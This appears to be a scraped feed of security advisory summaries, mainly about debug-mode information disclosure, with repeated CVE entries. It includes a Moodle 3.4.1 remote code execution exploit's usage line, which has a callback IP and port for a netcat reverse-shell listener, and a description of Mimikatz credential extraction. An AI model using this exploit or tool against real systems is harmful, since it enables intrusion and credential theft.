Mail.ru: [special.mail.ru] Information Disclosure

special.mail.ru was running misconfigured Laravel in debug mode, disclosing some sensitive information...

OPENSUSE-SU-2019:1111-1 Security update for openwsman

This update for openwsman fixes the following issues: Security issues fixed: - CVE-2019-3816: Fixed a vulnerability in openwsmand deamon which could lead to arbitary file disclosure bsc1122623. - CVE-2019-3833: Fixed a vulnerability in processconnection which could allow an attacker to trigger an...

Security update for openwsman (important)

openSUSE Security Update: Security update for openwsman Announcement ID: openSUSE-SU-2019:1111-1 Rating: important References: 1092206 1122623 Cross-References: CVE-2019-3816 CVE-2019-3833 Affected Products: openSUSE Leap 15.0 An update that fixes two vulnerabilities is now available. Description...

Mimikatz v2.2.0 - A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory

mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets. But that's not all!...

PYSEC-2019-78

A vulnerability was found in ceilometer before version 12.0.0.0rc1. An Information Exposure in ceilometer-agent prints sensitive configuration data to log files without DEBUG logging being activated...

PYSEC-2019-8

A vulnerability was found in ceilometer before version 12.0.0.0rc1. An Information Exposure in ceilometer-agent prints sensitive configuration data to log files without DEBUG logging being activated...

Cross-Site Scripting (XSS)

apache activemq is vulnerable to cross-site scripting XSS. A remote attacker is able to inject arbitrary Javascript into a victim's browser via the refresh parameter to PortfolioPublishServlet.java, and through debug logs or subscribe messages in webapp/websocket/chat.js...

WordPress Debug Mode

The web server on the remote host allows read access to WordPress debug file /wp-content/debug.log which contains debugging information such as PHP notices, warnings and errors. That means WordPress debug mode is enabled or if disabled log file has not been deleted. A remote attacker can exploit...

CVE-2018-18466

An issue was discovered in SecurEnvoy SecurAccess 9.3.502. When put in Debug mode and used for RDP connections, the application stores the emergency credentials in cleartext in the logs present in the DEBUG folder that can be accessed by anyone. NOTE: The vendor disputes this as a vulnerability...

CVE-2018-18466

An issue was discovered in SecurEnvoy SecurAccess 9.3.502. When put in Debug mode and used for RDP connections, the application stores the emergency credentials in cleartext in the logs present in the DEBUG folder that can be accessed by anyone. NOTE: The vendor disputes this as a vulnerability...

Design/Logic Flaw

DISPUTED An issue was discovered in SecurEnvoy SecurAccess 9.3.502. When put in Debug mode and used for RDP connections, the application stores the emergency credentials in cleartext in the logs present in the DEBUG folder that can be accessed by anyone. NOTE: The vendor disputes this as a...

SUSE-SU-2019:0654-1 Security update for openwsman

This update for openwsman fixes the following issues: Security issues fixed: - CVE-2019-3816: Fixed a vulnerability in openwsmand deamon which could lead to arbitary file disclosure bsc1122623. - CVE-2019-3833: Fixed a vulnerability in processconnection which could allow an attacker to trigger an...

Microsoft VBScript - VbsErase Memory Corruption

r eax=0000600c ebx=05dc10dc ecx=00000000 edx=00000000 esi=13371337 edi=05c5ca44 eip=6e0fc9fa esp=05c5ca28 ebp=05c5ca48 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 VBSCRIPT!VbsErase+0x5a: 6e0fc9fa 8b3e mov edi,dword ptr esi ds:002b:13371337=????????...

CVE-2018-18466

An issue was discovered in SecurEnvoy SecurAccess 9.3.502. When put in Debug mode and used for RDP connections, the application stores the emergency credentials in cleartext in the logs present in the DEBUG folder that can be accessed by anyone. NOTE: The vendor disputes this as a vulnerability...

CVE-2018-18466

An issue was discovered in SecurEnvoy SecurAccess 9.3.502. When put in Debug mode and used for RDP connections, the application stores the emergency credentials in cleartext in the logs present in the DEBUG folder that can be accessed by anyone. NOTE: The vendor disputes this as a vulnerability...

CVE-2018-18466

CVE-2018-18466 affects SecurEnvoy SecurAccess 9.3.502. When Debug mode is enabled and used for RDP, the emergency credentials are logged in cleartext in the DEBUG folder, exposing them to anyone with access. Root cause: logging of sensitive credentials in cleartext during debugging/debug logs; ve...

PT-2019-9594 · Microsoft +1 · Windows +1

Name of the Vulnerable Software and Affected Versions: SecurEnvoy SecurAccess version 9.3.502 Description: An issue was discovered in SecurEnvoy SecurAccess. When put in Debug mode and used for RDP connections, the application stores emergency credentials in cleartext in the logs, which can be...

Moodle 3.4.1 - Remote Code Execution Exploit

Exploit for php platform in category web applications php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the...

Moodle 3.4.1 Remote Code Execution

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure you're running a netcat listener on the...

Amazon Linux 2 : bind (ALAS-2019-1170)

Crash from assertion error when debug log level is 10 and log entries meet buffer boundary. This flaw appears to be exploitable only when debug logging is enabled and set to at least a level of 10. As this configuration should be rare in production instances of bind, it is unlikely that most...